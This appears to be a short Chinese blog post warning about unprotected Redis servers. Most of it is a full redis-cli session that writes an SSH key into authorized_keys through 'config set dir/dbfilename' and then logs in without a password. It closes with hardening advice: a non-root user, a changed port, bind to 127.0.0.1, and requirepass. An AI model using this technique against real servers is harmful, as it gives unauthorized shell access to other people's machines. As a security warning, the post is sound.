使用redis的时候,不注意,很容易就被人拿到shell啊。。。
redis,刚开始在线上运用的时候,就会有好多问题没有注意到。很容易,给漏出问题。让人有机会搞到shell。
xxx@debian:~/bash$ redis-cli -h 47.89.xx.xx -p 6379
47.89.xx.xx:6379>
47.89.xx.xx:6379>
47.89.xx.xx:6379> ls
(error) ERR unknown command 'ls'
47.89.xx.xx:6379> config set dir /root/.ssh/
(error) ERR Changing directory: Permission denied
47.89.xx.xx:6379> config set dir .
OK
47.89.xx.xx:6379> config set dir ~/.sh/
(error) ERR Changing directory: No such file or directory
47.89.xx.xx:6379> config set dir ~/.ssh/
(error) ERR Changing directory: No such file or directory
47.89.xx.xx:6379> config set dir .
OK
47.89.xx.xx:6379> config set dbfilename authorized_keys
OK
47.89.xx.xx:6379> set xxx "\n\n\nssh-rsa zzzzzzzzzzzzzzzzzzzzzz\n\n\n"
OK
47.89.xx.xx:6379> save
47.89.xx.xx:6379> config set dir /home/wwwroot/default/
(error) ERR Changing directory: No such file or directory
OK
47.89.xx.xx:6379> config set dir /home/seller_center/
OK
47.89.xx.xx:6379> config set dbfilename authorized_keys
OK
47.89.xx.xx:6379> set xxx "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4+kLQi93luRmXe4a9zR9iaqKrwuzKdSWjWmrkVP68cEdFfeDhrPTPQJq3VHGu9J4NrS8eSJwiPHJGUfy8VIe4W\n\n\n"
OK
47.89.xx.xx:6379> save
OK
47.89.xx.xx:6379> exit
xxxx@debian:~/bash$ ssh seller_center@47.89.xx.xx
Last login: Tue Jan 17 10:45:46 2017 from 119.xx.xx.xx
Welcome to aliyun Elastic Compute Service!
[seller_center@iZ629adohbqZ ~]$
对的,不用知道用户密码就登录上来了。
新人,大部分都会犯这个错误。还好当时没有用root启动redis…
尽量不要用root启动redis
修改配置文件,尽量修改端口6379为其他端口7890,如果不需要远程访问的,要使用bind定127.0.0.1
添加密码
配置文件里面有个requirepass foobared (foobared为密码)
然后终端访问 就是: redis-cli -h 127.0.0.1 -p 7890 -a foobared
django里面访问
BROKER_URL = 'redis://:password@127.0.0.1:7890/0'